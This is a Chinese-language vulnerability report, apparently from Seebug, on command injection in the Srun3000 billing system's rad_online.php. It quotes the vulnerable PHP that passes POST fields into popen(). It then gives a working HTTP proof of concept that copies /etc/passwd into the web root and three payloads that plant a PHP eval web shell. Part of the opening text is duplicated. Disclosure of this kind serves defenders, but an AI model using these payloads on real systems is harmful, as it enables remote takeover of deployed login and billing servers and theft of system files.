### 简要描述: Srun3000计费系统无限制任意命令执行getshell ### 详细说明: 文件: /en_us/rad_online.php srun3/web/online.php 4-76行 srun3/web/rad_online.php 4-76行 ``` if($_POST["action"]=="dm") { $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); echo $con; exit; } else if($_POST["action"]=="dm1") { $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); if(strstr($con, "1")) { $cmd = "/srun3/bin/set_user mac_auth ".$_POST["username"]." ".$_POST["mac"]." stop"; if($fp=popen($cmd, "r")) { //$con = fread($fp, 128); pclose($fp); } } echo $con; exit; } $username=trim($_POST["username"]); $password=trim($_POST["password"]); //echo $username.",".$password; //校验用户 if($username != "" && $password != "") { $cmd = "/srun3/bin/show_user ".$username. "|grep user_password_ori"; echo $username; if($fp=popen($cmd, "r")) { $con...
### 简要描述: Srun3000计费系统无限制任意命令执行getshell ### 详细说明: 文件: /en_us/rad_online.php srun3/web/online.php 4-76行 srun3/web/rad_online.php 4-76行 ``` if($_POST["action"]=="dm") { $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); echo $con; exit; } else if($_POST["action"]=="dm1") { $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); if(strstr($con, "1")) { $cmd = "/srun3/bin/set_user mac_auth ".$_POST["username"]." ".$_POST["mac"]." stop"; if($fp=popen($cmd, "r")) { //$con = fread($fp, 128); pclose($fp); } } echo $con; exit; } $username=trim($_POST["username"]); $password=trim($_POST["password"]); //echo $username.",".$password; //校验用户 if($username != "" && $password != "") { $cmd = "/srun3/bin/show_user ".$username. "|grep user_password_ori"; echo $username; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); if($con == "") { echo "用户不存在!"; } $con = substr($con, 19); if($password."\n" != $con) { echo "密码错误"; exit; } else { $cmd = "/srun3/bin/online_user -r -u ".$username; if($fp=popen($cmd, "r")) { $con = fread($fp, 2048); pclose($fp); //echo $con; } $arr = explode("\n", $con); } } else { exit; } } ``` poc: ``` POST /rad_online.php HTTP/1.1 Host: login.***.edu.cn Proxy-Connection: keep-alive Content-Length: 52 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://login.***.edu.cn User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded DNT: 1 Referer: http://login.***.edu.cn/ Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 action=dm&sid=1|cat /etc/passwd > /srun3/web/f.txt ``` sid、username、mac都存在命令执行漏洞 getshell1: ``` action=dm&sid=1||echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php ``` getshell2: ``` action=dm1&sid=1||echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php ``` getshell3: ``` username=1|echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php&password=123 ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201410/271200550e3cb4c84bd2983a00c6006edea7654e.jpg" alt="25192531a047f03c42babcce01508bcf10891a77.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/271200550e3cb4c84bd2983a00c6006edea7654e.jpg) [<img src="https://images.seebug.org/upload/201410/27120122f1c36a74e66914f418b4092c5392fc48.jpg" alt="2519240121e3806c0904abbbbbc5733c84158b91.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/27120122f1c36a74e66914f418b4092c5392fc48.jpg)
